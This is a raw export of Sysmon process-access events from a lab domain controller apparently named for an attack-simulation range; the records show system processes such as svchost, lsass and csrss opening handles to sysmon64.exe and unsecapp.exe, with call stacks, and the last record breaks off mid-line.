10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.696{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BF02-000000009001}2964C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.634{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8515-5FCF-BF02-000000009001}2964C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 